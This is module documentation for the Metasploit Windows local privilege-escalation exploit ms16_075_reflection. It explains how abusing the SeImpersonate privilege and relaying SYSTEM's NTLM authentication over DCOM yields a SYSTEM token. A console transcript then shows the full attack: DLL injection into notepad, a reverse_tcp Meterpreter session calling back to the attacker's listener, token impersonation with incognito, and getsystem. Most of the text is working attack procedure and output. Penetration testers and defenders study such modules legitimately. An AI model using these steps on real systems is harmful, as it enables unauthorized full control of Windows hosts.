## Introduction

  This module will abuse the SeImperonsate privilege commonly found in
services due to the requirement to impersonate a client upon
authentication. As such it is possible to impersonate the SYSTEM account
and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
attack at which intercepts the hash and relay responses from RPC to be
able to establish a handle to a new SYSTEM token. Some caveats : Set
your target option to match the architecture of your Meterpreter
session, else it will inject the wrong architecture DLL into the process
of a separate architecture. Additionally, after you have established a
session, you must use incognito to imperonsate the SYSTEM Token.

## Usage

  You'll first need to obtain a session on the target system.
  Next, once the module is loaded, one simply needs to set the
```payload``` and ```session``` options, in addition to architecture.

  Your user at which you are trying to exploit must have `SeImpersonate`
privileges.

  The module has a hardcoded timeout of 20 seconds, as the attack may
not work immediately and take a few seconds to start. Also, check to
make sure port 6666 is inherently not in use else the exploit will not
run properly

## Scenarios
```
  Name Current Setting Required Description
   ---- --------------- -------- -----------
   SESSION 48 yes The session to run this module on. Payload options 
(windows/x64/meterpreter/reverse_tcp):
   Name Current Setting Required Description
   ---- --------------- -------- -----------
   EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, 
process, none)
   LHOST ens3 yes The listen address (an interface may be specified)
   LPORT 3312 yes The listen port Exploit target:
   Id Name
   -- ----
   1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run 
[*] Started reverse TCP handler on -snip-:3312 [*] Launching notepad to 
host the exploit... [+] Process 3564 launched. [*] Reflectively 
injecting the exploit DLL into 3564... [*] Injecting exploit into 
3564... [*] Exploit injected. Injecting payload into 3564... [*] Payload 
injected. Executing exploit... [+] Exploit finished, wait for (hopefully 
privileged) payload execution to complete. [*] Sending stage (206403 
bytes) to -snip- [*] Meterpreter session 49 opened (-snip-:3312 -> 
-snip-:55306) at 2018-08-03 01:54:18 -0400 meterpreter > load incognito 
Loading extension incognito...Success. meterpreter > impersonate_token 
'NT AUTHORITY\SYSTEM' [-] Warning: Not currently running as SYSTEM, not 
all tokens will be available
             Call rev2self if primary process token is SYSTEM [-] No 
delegation token available [+] Successfully impersonated user NT 
AUTHORITY\SYSTEM meterpreter > getsystem -t 1 ...got system via 
technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > 
```
